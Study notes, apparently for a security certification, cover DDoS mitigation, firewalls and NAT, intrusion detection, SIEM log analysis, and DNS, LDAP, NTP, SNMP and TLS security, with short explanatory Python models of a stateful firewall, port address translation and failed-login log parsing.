● The only ways to defeat a jamming attack are either to locate the offending radio
source and disable it, or to boost the signal from the legitimate equipment.
○ The source of interference can be detected using a spectrum analyzer.
Distributed Denial of Service Attacks
● Most denial of service (DoS) attacks against websites and gateways are
distributed DoS (DDoS).
● Some types of DDoS attacks simply aim to consume network bandwidth, denying
it to legitimate hosts, by using overwhelming numbers of bots.
● For example, a SYN flood attack works by withholding the client's ACK packet
during TCP's three-way handshake.
○ A SYN flood is a DoS attack where the attacker sends numerous SYN
requests to a target server, hoping to consume enough resources to
prevent the transfer of legitimate traffic.

Amplification, Application, and OT Attacks


● Application Attacks:
○ An application attack targets vulnerabilities in the headers and payloads of
specific application protocols.
● Amplification Attack:
○ A network-based attack where the attacker dramatically increases the
bandwidth sent to a victim during a DDoS attack by implementing an
amplification factor.
● Operational Technology (OT) Attacks:
○ The term "operational" is used because these systems monitor and control
physical electromechanical components, such as valves, motors, electrical
switches, gauges, and sensors.
○ The limited resources of these devices mean that DDoS can rapidly
overwhelm available memory or CPU time.

Distributed Denial of Service Attack Mitigation


● DDoS attacks can be diagnosed by traffic spikes that have no legitimate
explanation, but can usually only be counteracted by providing high availability
services, such as load balancing and cluster services.
● When a network is faced with a DDoS or similar flooding attack, an ISP can use
either an access control list (ACL) or a blackhole to drop packets for the affected
IP address(es).
○ A blackhole is an area of the network that cannot reach any other part of
the network.
○ Remotely Triggered Black Hole (RTBH):
■ Using a trigger device to send a BGP route update that instructs
routers to drop traffic that is suspected of attempting DDoS.
● Sinkhole routing can be used so that the traffic flooding a particular IP address
is routed to a different network where it can be analyzed.

Load Balancing
● A load balancer distributes client requests across available server nodes in a
farm or pool.
● A load balancer also provides fault tolerance.
○ If there are multiple servers available in a farm, all addressed by a single
name/IP address via a load balancer, then if a single server fails, client
requests can be routed to another server in the farm.
● There are two main types of load balancers:
○ Layer 4 load balancer—basic load balancers make forwarding decisions
on IP address and TCP/UDP port values, working at the transport layer of
the OSI model.
○ Layer 7 load balancer (content switch)—as web applications have become
more complex, modern load balancers need to be able to make forwarding
decisions based on application-level data, such as a request for a
particular URL or data types like video or audio streaming.
● Scheduling:
○ The scheduling algorithm is the code and metrics that determine which
node is selected for processing each incoming request.
○ The simplest type of scheduling is called round robin; this just means
picking the next node.
○ The load balancer must also use some type of heartbeat or health check
probe to verify whether each node is available and under load or not.
● Source IP Affinity and Session Persistence:
○ Session Affinity: A scheduling approach used by load balancers to route
traffic to devices that have already established connections with the client
in question.
○ Session Persistence: the configuration option that enables a client to
maintain a connection with a load-balanced server over the duration of the
session.

Clustering
● A load balancing technique where a group of servers are configured as a unit
and work together to provide network services.
● If one of the nodes in the cluster stops working, connections can fail over to a
working node.
● Virtual IP:
○ Unlike load balancing with a single appliance, the public IP used to access
the service is shared between the two instances in the cluster.
○ This is referred to as a virtual IP or shared or floating address.
○ The instances are configured with a private connection, on which each is
identified by its "real" IP address.
● Active/Passive (A/P) and Active/Active (A/A) Clustering:
○ The major advantage of active/passive configurations is that performance
is not adversely affected during failover.
○ An active/active cluster means that both nodes are processing
connections concurrently.
■ In the event of a failover the workload of the failed node is
immediately and transparently shifted onto the remaining node.
● Application Clustering:
○ Application clustering allows servers in the cluster to communicate
session information to one another.
○ For example, if a user logs in on one instance, the next session can start
on another instance, and the new server can access the cookies or other
information used to establish the login.

Quality of Service (QoS)


● Quality of Service (QoS) is a framework for prioritizing traffic based on its
characteristics.
○ It is primarily used to support voice and video applications that require a
minimum level of bandwidth and are sensitive to latency and jitter.
● Latency is the time it takes for a transmission to reach the recipient, measured in
milliseconds (ms).
● Jitter is defined as being a variation in the delay, or an inconsistent rate of
packet delivery.

Lesson 10: Implementing Network Security Appliances

Packet Filtering Firewalls


● Packet filtering describes the earliest type of network firewall. All firewalls can still
perform this basic function.
● Access Control Lists (ACLs):
○ A packet filtering firewall is configured by specifying a group of rules,
called an access control list (ACL).
○ Each rule defines a specific type of data packet and the action to take
when a packet matches the rule.
○ A packet filtering firewall can inspect the headers of IP packets.
○ This means that rules can be based on the information found in those
headers:
■ IP filtering—accepting or denying traffic on the basis of its source
and/or destination IP address. Some firewalls might also be able to
filter by MAC addresses.
■ Protocol ID/type (TCP, UDP, ICMP, routing protocols, and so on).
■ Port filtering/security—accepting or denying a packet on the basis
of source and destination port numbers (TCP or UDP application
type).
● Stateless Operation:
○ A type of firewall that does not preserve information about the connection
between two hosts.
○ This type of filtering requires the least processing effort, but it can be
vulnerable to attacks that are spread over a sequence of packets.
■ A stateless firewall can also introduce problems in traffic flow,
especially when some sort of load balancing is being used or when
clients or servers need to use dynamically assigned ports.

Stateful Inspection Firewalls


● A stateful inspection firewall addresses these problems by tracking information
about the session established between two hosts, or blocking malicious attempts
to start a bogus session.
● The vast majority of firewalls now incorporate some level of stateful inspection
capability.
● Session data is stored in a state table.
● When a packet arrives, the firewall checks it to confirm whether it belongs to an
existing connection.
○ If it does not, it applies the ordinary packet filtering rules to determine
whether to allow it. Once the connection has been allowed, the firewall
usually allows traffic to pass unmonitored, in order to conserve processing
effort.
● Transport Layer (OSI Layer 4):
○ At the transport layer, the firewall examines the TCP three-way handshake
to distinguish new from established connections.
○ A legitimate TCP connection should follow a SYN > SYN/ACK > ACK
sequence to establish a session, which is then tracked using sequence
numbers.
○ Deviations from this, such as SYN without ACK or sequence number
anomalies, can be dropped as malicious flooding or session hijacking
attempts.
● Application Layer (OSI Layer 7):
○ An application-aware firewall can inspect the contents of packets at the
application layer.
○ One key feature is to verify the application protocol matches the port.
■ For example, a web application firewall could analyze the HTTP
headers and the HTML code present in HTTP packets to try to
identify code that matches a pattern in its threat database.
○ Also, the firewall cannot examine encrypted data packets, unless
configured with an SSL/TLS inspector.

IPTables
● iptables is a command line utility provided by many Linux distributions that
allows administrators to edit the rules enforced by the Linux kernel firewall.
● iptables works with chains, which apply to the different types of traffic, such as
the INPUT chain for traffic destined for the local host.
● Each chain has a default policy set to DROP or ACCEPT traffic that does not
match a rule.
● The command iptables --list INPUT --line-numbers -n will show
the contents of the INPUT chain with line numbers and no name resolution.
● The rules in the following example drop any traffic from the specific host at
10.1.0.192 and allow ICMP echo requests (pings), DNS, and HTTP/HTTPS traffic
either from the local subnet (10.1.0.0/24) or from any network (0.0.0.0/0):

● The destination 0.0.0.0/0 means "anywhere."
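The packet filtering, stateful inspection, and iptables passages above all rest on the same evaluation logic, shown here as an added Python model that is not iptables and not part of the original notes. The rule set is constructed from the description above (which services are limited to the local subnet is an assumption), and the class names, the server address 10.1.0.10, and the external addresses are hypothetical.

```python
import ipaddress
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str                 # "tcp", "udp" or "icmp"
    sport: int = 0
    dport: int = 0
    flags: str = ""            # TCP flags: "S" (SYN), "SA" (SYN/ACK), "A" (ACK)
    icmp_type: str = ""


@dataclass(frozen=True)
class Rule:
    action: str                # "ACCEPT" or "DROP"
    src: str = "0.0.0.0/0"     # 0.0.0.0/0 means "anywhere"
    proto: str = "any"
    dport: Optional[int] = None
    icmp_type: Optional[str] = None

    def matches(self, pkt: Packet) -> bool:
        if ipaddress.ip_address(pkt.src) not in ipaddress.ip_network(self.src):
            return False
        if self.proto not in ("any", pkt.proto):
            return False
        if self.dport is not None and self.dport != pkt.dport:
            return False
        if self.icmp_type is not None and self.icmp_type != pkt.icmp_type:
            return False
        return True


# Constructed rule set; order matters because the first match wins.
CHAIN = [
    Rule("DROP", src="10.1.0.192/32"),
    Rule("ACCEPT", src="10.1.0.0/24", proto="icmp", icmp_type="echo-request"),
    Rule("ACCEPT", src="10.1.0.0/24", proto="udp", dport=53),
    Rule("ACCEPT", proto="tcp", dport=80),
    Rule("ACCEPT", proto="tcp", dport=443),
]


class StatefulFirewall:
    def __init__(self, chain, default_policy="DROP"):
        self.chain = chain
        self.default_policy = default_policy
        self.state = {}        # (client, cport, server, sport) -> handshake state

    def match_chain(self, pkt):
        """Stateless packet filtering: first matching rule, else default policy."""
        for rule in self.chain:
            if rule.matches(pkt):
                return rule.action
        return self.default_policy

    def filter(self, pkt):
        if pkt.proto != "tcp":
            return self.match_chain(pkt)
        fwd = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
        rev = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
        if fwd in self.state:                      # client -> server direction
            if self.state[fwd] == "ESTABLISHED":
                return "ACCEPT"
            if self.state[fwd] == "SYN_ACK_SEEN" and pkt.flags == "A":
                self.state[fwd] = "ESTABLISHED"
                return "ACCEPT"
            return "DROP"                          # out of sequence (simplified)
        if rev in self.state:                      # server -> client direction
            if self.state[rev] == "ESTABLISHED":
                return "ACCEPT"
            if self.state[rev] == "SYN_SEEN" and pkt.flags == "SA":
                self.state[rev] = "SYN_ACK_SEEN"
                return "ACCEPT"
            return "DROP"
        if pkt.flags == "S":                       # new connection: consult the ACL
            verdict = self.match_chain(pkt)
            if verdict == "ACCEPT":
                self.state[fwd] = "SYN_SEEN"
            return verdict
        return "DROP"                              # no SYN seen, no state entry


def demo():
    fw = StatefulFirewall(CHAIN)
    srv, ext = "10.1.0.10", "203.0.113.5"          # constructed addresses
    return [
        fw.filter(Packet(ext, srv, "tcp", 40000, 443, "S")),    # new, allowed by ACL
        fw.filter(Packet(srv, ext, "tcp", 443, 40000, "SA")),   # reply tracked in table
        fw.filter(Packet(ext, srv, "tcp", 40000, 443, "A")),    # handshake complete
        fw.filter(Packet("203.0.113.9", srv, "tcp", 40001, 443, "A")),  # ACK, no SYN
        fw.filter(Packet("10.1.0.192", srv, "tcp", 40002, 80, "S")),    # blocked host
        fw.filter(Packet(ext, srv, "udp", 5353, 53)),           # DNS from outside subnet
        fw.filter(Packet("10.1.0.20", srv, "icmp", icmp_type="echo-request")),
    ]
```

Only the first SYN of a connection is checked against the chain; later segments are judged against the state table, which is why the stray ACK is dropped even though port 443 is open.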

Firewall Implementation
● You should consider how the firewall is implemented—as hardware or software,
for instance—to cover a given placement or use on the network.
● Firewall Appliances:
○ An appliance firewall is a stand-alone hardware firewall deployed to
monitor traffic passing into and out of a network zone.
○ A firewall appliance can be deployed in two ways:
■ Routed (layer 3)—the firewall performs forwarding between
subnets.
● Each interface on the firewall connects to a different subnet
and represents a different security zone.
■ Bridged (layer 2)—the firewall inspects traffic passing between two
nodes, such as a router and a switch.
● A router firewall or firewall router appliance implements filtering functionality as
part of the router firmware.
● Application-Based Firewalls:
○ Firewalls can also run as software on any type of computing host.
○ Host-based firewall (or personal firewall)—implemented as a software
application running on a single host designed to protect that host only.
■ A personal firewall can be used to allow or deny software
processes from accessing the network.
○ Application firewall—software designed to run on a server to protect a
particular application only (a web server firewall, for instance, or a firewall
designed to protect an SQL Server database).
○ Network operating system (NOS) firewall—a software-based firewall
running under a network server OS, such as Windows or Linux.
■ The server would function as a gateway or proxy for a network
segment.

Proxies and Gateways


● A firewall that performs application layer filtering is likely to be implemented as a
proxy.
● The proxy deconstructs each packet, performs analysis, then rebuilds the packet
and forwards it on, providing it conforms to the rules.
● Forward Proxy Servers:
○ A forward proxy provides for protocol-specific outbound traffic.
○ For example, you might deploy a web proxy that enables client computers
on the LAN to connect to websites and secure websites on the Internet.
● In addition, most web proxy servers provide caching engines, whereby
frequently requested web pages are retained on the proxy, negating the need to
re-fetch those pages for subsequent requests.
● Proxy servers can generally be classed as non-transparent or transparent:
○ A non-transparent proxy means that the client must be configured with
the proxy server address and port number to use it.
○ A transparent (or forced or intercepting) proxy intercepts client traffic
without the client having to be reconfigured.
■ A transparent proxy must be implemented on a switch or router or
other inline network appliance.
● Reverse Proxy Servers:
○ A reverse proxy server provides for protocol-specific inbound traffic.
○ For security purposes, you might not want external hosts to be able to
connect directly to application servers, such as web, email, and VoIP
servers.

Access Control Lists


● Firewall access control lists (ACLs) are configured on the principle of least
access.
● Each rule can specify whether to block or allow traffic based on several
parameters, often referred to as a tuple.
○ For example, in the previous screenshot, the firewall imposes a 7-tuple
rule, which matches against Protocol, Source (address), (Source) Port,
Destination (address), (Destination) Port, Gateway, and Schedule.

Network Address Translation


● A routing mechanism that conceals internal addressing schemes from the public
Internet by translating between a single public address on the external side of a
router and private, non-routable addresses internally.
● Static and dynamic source NAT—perform 1:1 mappings between private ("inside
local") network addresses and public ("inside global") addresses.
● Overloaded NAT/Network Address Port Translation (NAPT)/Port Address
Translation (PAT)—provides a means for multiple private IP addresses to be
mapped onto a single public address.
○ For example, say two hosts (10.0.0.101 and 10.0.0.103) initiate a web
connection at the same time.
■ The NAPT service creates two new port mappings for these
requests (10.0.0.101:60101 and 10.0.0.103:60103). It then
substitutes the private IPs for the public IP and forwards the
requests to the public Internet.
● Destination NAT/port forwarding—uses the router's public address to publish a
web service, but forwards incoming requests to a different IP.
○ Port forwarding means that the router takes requests from the Internet for
a particular application (say, HTTP/port 80) and sends them to a
designated host and port in the DMZ or LAN.
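The NAPT and port forwarding behavior described above, as an added Python model that is not part of the original notes. The class name, the public address 198.51.100.1, the remote addresses, and the DMZ host 10.0.0.50 are hypothetical, public ports are handed out sequentially by this example's own allocator, and tying each mapping to the remote endpoint it was created for is a design choice of the model.

```python
class Napt:
    """Minimal model of overloaded NAT (NAPT/PAT) with static port forwarding."""

    def __init__(self, public_ip, first_port=60101, last_port=60110):
        self.public_ip = public_ip
        self.free_ports = list(range(first_port, last_port + 1))
        # (private_ip, private_port, remote_ip, remote_port) -> public_port
        self.out_map = {}
        # (public_port, remote_ip, remote_port) -> (private_ip, private_port)
        self.in_map = {}
        # public_port -> (internal_ip, internal_port), configured by the admin
        self.forwards = {}

    def outbound(self, private_ip, private_port, remote_ip, remote_port):
        """Translate an outbound connection; returns the public (ip, port) used."""
        key = (private_ip, private_port, remote_ip, remote_port)
        if key not in self.out_map:
            if not self.free_ports:
                raise RuntimeError("NAPT port pool exhausted")
            port = self.free_ports.pop(0)
            self.out_map[key] = port
            self.in_map[(port, remote_ip, remote_port)] = (private_ip, private_port)
        return self.public_ip, self.out_map[key]

    def add_forward(self, public_port, internal_ip, internal_port):
        """Destination NAT: publish one internal service on the public address."""
        if public_port in self.free_ports:
            self.free_ports.remove(public_port)
        self.forwards[public_port] = (internal_ip, internal_port)

    def inbound(self, remote_ip, remote_port, public_port):
        """Return the internal (ip, port) for an inbound packet, or None to drop."""
        if public_port in self.forwards:
            return self.forwards[public_port]
        return self.in_map.get((public_port, remote_ip, remote_port))


def demo():
    nat = Napt("198.51.100.1")
    nat.add_forward(80, "10.0.0.50", 8080)          # web server in the DMZ
    web = ("203.0.113.80", 443)                     # constructed remote site
    # Two hosts use the same private source port at the same time.
    a = nat.outbound("10.0.0.101", 49152, *web)
    b = nat.outbound("10.0.0.103", 49152, *web)
    return {
        "a": a,
        "b": b,
        "reply_to_b": nat.inbound(web[0], web[1], b[1]),
        "unsolicited": nat.inbound("192.0.2.66", 443, a[1]),
        "published_http": nat.inbound("192.0.2.66", 51000, 80),
        "closed_port": nat.inbound("192.0.2.66", 51000, 22),
    }
```

The unsolicited and closed-port lookups return None: without a mapping or an explicit forward there is no internal host to deliver to, which is the concealment property the notes describe.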

Virtual Firewalls
● Virtual firewalls are usually deployed within data centers and cloud services.
● Hypervisor-based—this means that filtering functionality is built into the
hypervisor or cloud provisioning tool.
○ You can use the cloud's web app or application programming interface
(API) to write access control lists (ACLs) for traffic arriving or leaving a
virtual host or virtual network.
● Virtual appliance—this refers to deploying a vendor firewall appliance instance
using virtualization, in the same way you might deploy a Windows or Linux guest
OS.
● Multiple context—this refers to multiple virtual firewall instances running on a
hardware firewall appliance.

Open-Source Versus Proprietary Firewalls


● The code underpinning appliance-based, software, and virtual firewalls can be
developed as open-source or proprietary or somewhere in between:
○ Wholly proprietary—implemented as a proprietary OS, such as Cisco
ASA, Juniper JunOS, PaloAlto PAN-OS, or Barracuda's Windows-based
appliance.
○ Mostly proprietary—developed from a Linux kernel, but with proprietary
features added.
○ Wholly open-source—these can be used independently of the vendor, but
the vendors typically have commercial appliances and support contracts
too.

Network-Based Intrusion Detection Systems


● An intrusion detection system (IDS) is a means of using software tools to
provide real-time analysis of either network traffic or system and application logs.
● A network-based IDS (NIDS) captures traffic via a packet sniffer, referred to as
a sensor.
○ It analyzes the packets to identify malicious traffic and displays alerts to a
console or dashboard.
● A NIDS, such as Snort (snort.org), Suricata (https://suricata.io/), or Zeek/Bro
(zeek.org), performs passive detection.
○ When traffic is matched to a detection signature, it raises an alert or
generates a log entry, but does not block the source host.
○ This type of passive sensor does not slow down traffic and is undetectable
by the attacker.
● A NIDS is used to identify and log hosts and applications and to detect attack
signatures, password guessing attempts, port scans, worms, backdoor
applications, malformed packets or sessions, and policy violations.

Taps and Port Mirrors


● Typically, the packet capture sensor is placed inside a firewall or close to a
server of particular importance.
○ The idea is usually to identify malicious traffic that has managed to get
past the firewall.
● There are three main options for connecting a sensor to the appropriate point in
the network:
○ SPAN (switched port analyzer)/mirror port—this means that the sensor
is attached to a specially configured port on the switch that receives
copies of frames addressed to nominated access ports (or all the other
ports).
○ Passive test access point (TAP)—this is a box with ports for incoming
and outgoing network cabling and an inductor or optical splitter that
physically copies the signal from the cabling to a monitor port.
■ A hardware device inserted into a cable to copy frames for analysis.
○ Active TAP—this is a powered device that performs signal regeneration
(again, there are copper and fiber variants), which may be necessary in
some circumstances.

Network-Based Intrusion Prevention Systems


● A network security tool that can actively block attacks.
○ One typical preventive measure is to end the TCP session, sending a TCP
reset packet to the attacking host.
○ Another option is for the IPS to apply a temporary filter on the firewall to
block the attacker's IP address (shunning).
● IPS appliances are positioned like firewalls at the border between two network
zones.

Signature-Based Detection
● Signature-based detection (or pattern-matching) means that the engine is
loaded with a database of attack patterns or signatures.
● If traffic matches a pattern, then the engine generates an incident.
● The signatures and rules (often called plug-ins or feeds) powering intrusion
detection need to be updated regularly to provide protection against the latest
threat types.

Behavior and Anomaly-Based Detection


● Behavioral-based detection means that the engine is trained to recognize
baseline "normal" traffic or events.
○ Anything that deviates from this baseline (outside a defined level of
tolerance) generates an incident.
○ The idea is that the software will be able to identify zero day attacks,
insider threats, and other malicious activity for which there is no signature.
● Heuristics:
○ A method that uses feature comparisons and likenesses rather than
specific signature matching to identify whether the target of observation is
malicious.

Next-Generation Firewalls and Content Filters


● Next-Generation Firewall (NGFW): Host or network firewall capable of parsing
application layer protocol headers and data (such as HTTP or SMTP) so that
sophisticated, content-sensitive ACLs can be developed.
● Unified Threat Management (UTM):
○ UTM refers to a security product that centralizes many types of security controls
—firewall, anti-malware, network intrusion prevention, spam filtering,
content filtering, data loss prevention, VPN, cloud access gateway—into a
single appliance.
○ This means that you can monitor and manage the controls from a single
console.
● Content/URL Filter:
○ A content filter is designed to apply a number of user-focused filtering
rules, such as blocking uniform resource locators (URLs) that appear on
content block lists or applying time-based restrictions to browsing.
■ Content filters are now usually implemented as a class of product
called a secure web gateway (SWG).

Host-Based Intrusion Detection Systems


● A host-based IDS (HIDS) captures information from a single host, such as a
server, router, or firewall.
● The core ability is to capture and analyze log files, but more sophisticated
systems can also monitor OS kernel files, monitor ports and network interfaces,
and process data and logs generated by specific applications, such as HTTP or
FTP.
● One of the core features of HIDS is file integrity monitoring (FIM).
○ A type of software that reviews system files to ensure that they have not
been tampered with.

Web Application Firewalls


● A web application firewall (WAF) is designed specifically to protect software
running on web servers and their back-end databases from code injection and
DoS attacks.
● The WAF can be programmed with signatures of known attacks and use pattern
matching to block requests containing suspect code.
● A WAF may be deployed as an appliance or as plug-in software for a web server
platform.
● Some examples of WAF products include:
○ ModSecurity (modsecurity.org) is an open source (sponsored by
Trustwave) WAF for Apache, nginx, and IIS.
○ NAXSI (github.com/nbs-system/naxsi) is an open source module for the
nginx web server software.
○ Imperva (imperva.com) is a commercial web security offering with a
particular focus on data centers.

Monitoring Services
● Network Monitor:
○ A network monitor collects data about network appliances, such as switches, access points,
routers, firewalls, and servers.
○ This is used to monitor load status for CPU/memory, state tables, disk
capacity, fan speeds/temperature, network link utilization/error statistics,
and so on.
○ This data might be collected using the Simple Network Management
Protocol (SNMP) or a proprietary management system.
● Logs:
○ A security log can record both authorized and unauthorized uses of a
resource or privilege.
Security Information and Event Management
● A solution that provides real-time or near-real-time analysis of security alerts
generated by network hardware and applications.
● Log Collection:
○ The first task for SIEM is to collect data inputs from multiple sources.
● There are three main types of log collection:
○ Agent-based—with this approach, you must install an agent service on
each host.
○ Listener/collector—rather than installing an agent, hosts can be
configured to push updates to the SIEM server using a protocol such as
syslog or SNMP.
○ Sensor—as well as log data, the SIEM might collect packet captures and
traffic flow data from sniffers.
● Log Aggregation:
○ Log aggregation refers to normalizing data from different sources so that it is consistent
and searchable.

Analysis and Report Review


● A critical function of SIEM—and the principal factor distinguishing it from basic
log management—is that of correlation.
● User and Entity Behavior Analytics (UEBA):
○ A UEBA solution supports identification of malicious behaviors from comparison to
a baseline.
○ The analytics software tracks user account behavior across different
devices and cloud services.
○ Entity refers to machine accounts, such as client workstations or
virtualized server instances, and to embedded hardware, such as Internet
of Things (IoT) devices.
● Sentiment Analysis:
○ One of the biggest challenges for behavior analytics driven by machine
learning is to identify intent.
○ Sentiment Analysis: Devising an AI/ML algorithm that can describe or
classify the intention expressed in natural language statements.
■ The typical use case for sentiment analysis is to monitor social
media for brand "incidents," such as a disgruntled customer
announcing on Twitter what poor customer service they have just
received.
● Security Orchestration, Automation, and Response:
○ Security orchestration, automation, and response (SOAR) is designed as
a solution to the problem of the volume of alerts overwhelming analysts'
ability to respond.
○ The basis of SOAR is to scan the organization's store of security and
threat intelligence, analyze it using machine/deep learning techniques,
and then use that data to automate and provide data enrichment for the
workflows that drive incident response and threat hunting.

File Manipulation
● While SIEM can automate many functions of log collection and review, you may
also have to manually prepare data using a Linux command line.
● The Cat Command:
○ The Linux cat command allows you to view the contents of one or more
files.
○ For example, if you want to view the whole contents of two rotated log
files, you could run: cat -n access.log access2.log
○ The -n switch adds line numbers.
● The head and tail Commands:
○ The head and tail commands output the first and last 10 lines
respectively of a file you provide.
● The Logger Command:
○ The logger command writes input to the local system log or to a remote
syslog server.
Regular Expressions and GREP
● Regular Expressions (regex): A group of characters that describes how to execute
a specific search pattern on a given text.
● The following list illustrates some commonly used elements of regex syntax:
○ [ … ] matches a single instance of a character within the brackets. This
can include literals, ranges such as [a-z], and token matches, such as [\s]
(white space) or [\d] (one digit).
○ + matches one or more occurrences. A quantifier is placed after the term
to match; for example, \s+ matches one or more white space characters.
○ * matches zero or more times.
○ ? matches once or not at all.
○ {} matches a number of times. For example, {2} matches two times, {2,}
matches two or more times, and {2,5} matches two to five times.
● Grep Command: The grep command invokes simple string matching or regex
syntax to search text files for specific strings.
○ This enables you to search the entire contents of a text file for a specific
pattern within each line and display that pattern on the screen or dump it
to another file.
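The regex elements listed above, applied to log review as an added example that is not part of the original notes. It uses Python's re module rather than grep itself; the log lines are constructed in the style of an sshd authentication log, and the function names and the threshold are hypothetical.

```python
import re
from collections import Counter

# Constructed sample lines (not real data).
SAMPLE_LOG = [
    "Mar  3 10:15:01 srv1 sshd[2211]: Failed password for invalid user admin from 203.0.113.7 port 51022 ssh2",
    "Mar  3 10:15:03 srv1 sshd[2211]: Failed password for root from 203.0.113.7 port 51024 ssh2",
    "Mar  3 10:15:09 srv1 sshd[2214]: Accepted password for alice from 10.1.0.20 port 40100 ssh2",
    "Mar  3 10:16:40 srv1 sshd[2230]: Failed password for bob from 198.51.100.23 port 60001 ssh2",
    "Mar  3 10:16:44 srv1 sshd[2231]: Failed  password for invalid user test from 203.0.113.7 port 51030 ssh2",
    "Mar  3 10:17:00 srv1 CRON[2240]: (root) CMD (run-parts /etc/cron.hourly)",
]

FAILED_LOGIN = re.compile(
    r"sshd\[\d+\]:\s+Failed\s+password\s+for\s+"   # + : one or more digits / spaces
    r"(invalid user\s+)?"                          # ? : present once or not at all
    r"(?P<user>[a-z_][a-z0-9_-]*)\s+"              # [...] class, * : zero or more
    r"from\s+(?P<ip>\d{1,3}(\.\d{1,3}){3})\s+"     # {1,3} and {3} : counted repeats
    r"port\s+(?P<port>\d{1,5})"
)
# Note: \d{1,3} checks the shape of an IPv4 address, not that each octet is <= 255.


def grep(pattern, lines):
    """Return the lines containing a match, as grep -E would print them."""
    rx = re.compile(pattern)
    return [line for line in lines if rx.search(line)]


def failed_by_source(lines):
    """Count failed SSH password attempts per source IP address."""
    counts = Counter()
    for line in lines:
        match = FAILED_LOGIN.search(line)
        if match:
            counts[match.group("ip")] += 1
    return counts


def noisy_sources(lines, threshold=3):
    """Source addresses with at least `threshold` failed attempts."""
    return sorted(ip for ip, n in failed_by_source(lines).items() if n >= threshold)
```

The fifth sample line has two spaces after "Failed"; a literal string search for "Failed password" would miss it, while \s+ still matches.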

Lesson 11: Implementing Secure Network Protocols

Network Address Location


● Interface addresses for routers, firewalls, and some types of servers are best
assigned and managed manually.
● DHCP:
○ The key point about DHCP is that only one server should be offering
addresses to any one group of hosts.
○ If a rogue DHCP server is set up, it can perform DoS (as client machines
will obtain an incorrect TCP/IP configuration) or be used to snoop network
information.
○ DHCP starvation is a type of DoS attack where a rogue client repeatedly
requests new IP addresses using spoofed MAC addresses, with the aim of
exhausting the IP address pool.
● Enabling the DHCP snooping port security feature on a switch can mitigate rogue
DHCP attacks.
○ Windows DHCP servers in an AD environment automatically log any traffic
detected from unauthorized DHCP servers.

Domain Name Resolution


● The Domain Name System (DNS) uses a distributed database system that contains
information on domains and hosts within those domains.
● The information is distributed among many name servers, each of which holds
part of the database.
● Domain Hijacking:
○ Domain hijacking is an attack where an adversary acquires a domain for
a company's trading name or trademark, or perhaps some spelling
variation thereof.
○ In a domain hijacking attack an adversary gains control over the
registration of a domain name, allowing the host records to be configured
to IP addresses of the attacker's choosing.
○ The whois command can be used to look up domain registration
information to try to detect misuse in other cases.
● Uniform Resource Locator (URL) Redirection:
○ A URL comprises a FQDN, file path, and often script parameters.
○ URL redirection refers to the use of HTTP redirecting to open a page other
than the one the user requested.
● Domain Reputation:
○ If your domain, website, or email servers have been hijacked, they are
likely to be used for spam or distributing malware.
○ You should set up monitoring using a site such as
talosintelligence.com/reputation_center to detect misuse early.
DNS Poisoning
● DNS poisoning is an attack that compromises the process by which clients
query name servers to locate the IP address for a Fully Qualified Domain Name
(FQDN).
● Man in the Middle:
○ If the threat actor has access to the same local network as the victim, the
attacker can use Address Resolution Protocol (ARP) poisoning to
impersonate a legitimate DNS server and respond to DNS queries from
the victim with spoofed replies.
● DNS Client Cache Poisoning:
○ Before DNS was developed in the 1980s, name resolution took place
using a text file named HOSTS. The file is still present on most operating
systems, and its mappings are typically checked before a DNS query is made.
○ Therefore, if an attacker is able to place a false <name>:<IP address>
mapping in the HOSTS file and effectively poison the DNS cache, he or
she will be able to redirect traffic.
● DNS Server Cache Poisoning:
○ DNS server cache poisoning aims to corrupt the records held by the DNS
server itself.
○ This can be accomplished by performing DoS against the server that
holds the authorized records for the domain, and then spoofing replies to
requests from other name servers.

DNS Security
● To ensure DNS security on a private network, local DNS servers should only
accept recursive queries from local hosts (preferably authenticated local hosts)
and not from the Internet.
● You also need to implement access control measures on the server, to prevent a
malicious user from altering records manually.
● DNS Security Extensions (DNSSEC):
○ DNSSEC helps to mitigate spoofing and poisoning attacks by providing a
validation process for DNS responses.
○ With DNSSEC enabled, the authoritative server for the zone creates a
"package" of resource records (called an RRset) signed with a private key
(the Zone Signing Key).

Secure Directory Services


● A network directory lists the subjects (principally users, computers, and services)
and objects (such as directories and files) available on the network plus the
permissions that subjects have over objects.
● Most directory services are based on the Lightweight Directory Access
Protocol (LDAP), running over port 389.
● Authentication (referred to as binding to the server) can be implemented in the
following ways:
○ No authentication—anonymous access is granted to the directory.
○ Simple bind—the client must supply its distinguished name (DN) and
password, but these are passed as plaintext.
○ Simple Authentication and Security Layer (SASL)—the client and server
negotiate the use of a supported authentication mechanism, such as
Kerberos.
○ LDAP Secure (LDAPS)—the server is installed with a digital certificate,
which it uses to set up a secure tunnel for the user credential exchange.
LDAPS uses port 636.

Time Synchronization
● The Network Time Protocol (NTP) provides a transport over which to synchronize
time-dependent applications. NTP works over UDP on port 123.
● Top-level NTP servers (stratum 1) obtain the Coordinated Universal Time (UTC)
from a highly accurate clock source, such as an atomic clock.
● Lower tier servers then obtain the UTC from multiple stratum 1 servers and
sample the results to obtain an authoritative time.
● NTP has historically lacked any sort of security mechanism, but there are moves
to create a security extension for the protocol called Network Time Security.
Simple Network Management Protocol Security
● The Simple Network Management Protocol (SNMP) is a widely used
framework for management and monitoring. SNMP consists of an SNMP monitor
and agents.
● The agent is a process (software or firmware) running on a switch, router, server,
or other SNMP-compatible network device.
● This agent maintains a database called a management information base (MIB)
that holds statistics relating to the activity of the device (for example, the number
of frames per second handled by a switch).
○ The agent is also capable of initiating a trap operation where it informs the
management system of a notable event (port failure, for instance).
● The SNMP monitor (a software program) provides a location from which network
activity can be overseen.
○ It monitors all agents by polling them at regular intervals for information
from their MIBs and displays the information for review.

Hypertext Transfer Protocol and Web Services


● HTTP enables clients (typically web browsers) to request resources from an
HTTP server.
● A client connects to the HTTP server using an appropriate TCP port (the default
is port 80) and submits a request for a resource, using a uniform resource locator
(URL).
● The server acknowledges the request and responds with the data (or an error
message).
● The response and request payload formats are defined in an HTTP header.

Transport Layer Security


● A security protocol that uses certificates for authentication and encryption to
protect web communication.
● Secure Sockets Layer (SSL) proved very popular with the industry, and it was
quickly adopted as a standard named Transport Layer Security (TLS).
● To implement TLS, a server is assigned a digital certificate signed by some
trusted certificate authority (CA).
○ The certificate proves the identity of the server (assuming that the client
trusts the CA) and validates the server's public/private key pair.
○ The server uses its key pair and the TLS protocol to agree upon mutually
supported ciphers with the client and negotiate an encrypted
communications session.
● SSL/TLS Versions:
○ While the acronym SSL is still used, the Transport Layer Security versions
are the only ones that are safe to use.
